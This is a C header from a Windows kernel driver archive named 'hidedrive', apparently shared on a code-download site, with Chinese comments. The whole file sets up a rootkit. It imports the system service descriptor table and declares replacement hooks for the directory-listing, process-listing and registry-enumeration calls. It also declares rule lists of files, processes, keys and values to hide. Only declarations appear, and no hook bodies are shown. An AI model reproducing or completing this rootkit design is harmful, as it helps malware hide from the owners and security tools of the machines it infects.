hidedrive.rar Cyber02Hide.h

www.pudn.com > hidedrive.rar > Cyber02Hide.h

#ifndef _HOOKPORT0123456789_
#define _HOOKPORT0123456789_
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ndis.h>
#include "timeandproc.h"

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase; //Used only in checked build
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

/******************************************驱动处理函数********************************************/
//卸载
void DriverUnload(IN PDRIVER_OBJECT DriverObject);//驱动卸载
NTSTATUS DriverIoControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);//驱动控制
//分发
NTSTATUS
DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

/******************************************文件隐藏相关********************************************/
typedef struct _FILE_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;//原函数

//申明要Hook的函数
NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

//定义ZwQueryDirectoryFile的函数指针
typedef NTSTATUS (*REALZWQUERYDIRECTORYFILE)(IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

//定义一个原函数指针
REALZWQUERYDIRECTORYFILE RealZwQueryDirectoryFile;

//定义替换API函数的原型
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

/*要隐藏的文件名称信息*/
PUCHAR m_FileHideInfo = NULL;

/*要隐藏的文件信息个数*/
ULONG m_FileRuleNum = 0; //add by htr on 2005-06-27

//文件隐藏的传递格式
typedef struct _FileHideRule{
char rule[256];//要隐藏的文件名
struct _FileHideRule *_next;//下一项指针
} FILEHIDERULE, *PFILEHIDERULE;

//添加和删除文件隐藏规则函数
UCHAR AddFileCtrlInfo(PFILEHIDERULE FileRule);
UCHAR DelFileCtrlInfo(PFILEHIDERULE FileRule);

/******************************************进程隐藏相关********************************************/
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};

//申明要Hook的函数
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformaitonLength,
OUT PULONG ReturnLength OPTIONAL);

//定义ZwQuerySystemInformation的函数指针
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformaitonLength,
OUT PULONG ReturnLength OPTIONAL);

//定义一个进程查看原函数指针
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;

//定义替换进程API函数的原型
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformaitonLength,
OUT PULONG ReturnLength OPTIONAL);

/*要隐藏的进程名称信息*/
PUCHAR m_ProcessHideInfo = NULL;

/*要隐藏的进程信息个数*/
ULONG m_ProcessRuleNum = 0; //add by htr on 2005-06-27

//进程隐藏的传递格式
typedef struct _ProcessHideRule{
char rule[256];//要隐藏的文件名
struct _ProcessHideRule *_next;//下一项指针
} PROCESSHIDERULE, *PPROCESSHIDERULE;

//添加和删除进程隐藏规则函数
UCHAR AddProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);
UCHAR DelProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);

/******************************************注册表项隐藏相关********************************************/
//申明要Hook的函数
NTSYSAPI NTSTATUS NTAPI ZwEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength);

//定义ZwQuerySystemInformation的函数指针
typedef NTSTATUS (*REALZWENUMERATEKEY)(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength);

//定义一个注册表查看原函数指针
REALZWENUMERATEKEY RealZwEnumerateKey;

//定义替换注册表API函数的原型
NTSTATUS HookZwEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength);

/*要隐藏的注册表名称信息*/
PUCHAR m_KeyHideInfo = NULL;
/*要隐藏的注册表信息个数*/
ULONG m_KeyRuleNum = 0; //add by htr on 2005-06-27

/*特定项下存在的要隐藏的注册表名称信息*/
PUCHAR t_KeyHideInfo = NULL;
/*特定项下存在的要隐藏的注册表信息个数*/
ULONG t_KeyRuleNum = 0; //add by htr on 2005-06-27

//注册表隐藏的传递格式
typedef struct _KeyHideRule{
char rule[256];//要隐藏的文件名
struct _KeyHideRule *_next;//下一项指针
} KEYHIDERULE, *PKEYHIDERULE;

//添加和删除注册表隐藏规则函数
UCHAR AddKeyCtrlInfo(PKEYHIDERULE KeyRule);
UCHAR DelKeyCtrlInfo(PKEYHIDERULE KeyRule);

/******************************************注册表键值隐藏相关********************************************/
//申明要Hook的函数
NTSYSAPI NTSTATUS
ZwEnumerateValueKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
);

//定义ZwQuerySystemInformation的函数指针
typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
);

//定义一个注册表查看原函数指针
REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey;

//定义替换注册表API函数的原型
NTSTATUS HookZwEnumerateValueKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
);

/*要隐藏的注册表名称信息*/
PUCHAR m_ValueHideInfo = NULL;
/*要隐藏的注册表信息个数*/
ULONG m_ValueRuleNum = 0; //add by htr on 2005-06-27

//注册表隐藏的传递格式
typedef struct _ValueHideRule{
char rule[256];//要隐藏的文件名
struct _ValueHideRule *_next;//下一项指针
} VALUEHIDERULE, *PVALUEHIDERULE;

//添加和删除注册表隐藏规则函数
UCHAR AddValueCtrlInfo(PVALUEHIDERULE ValueRule);
UCHAR DelValueCtrlInfo(PVALUEHIDERULE ValueRule);

#endif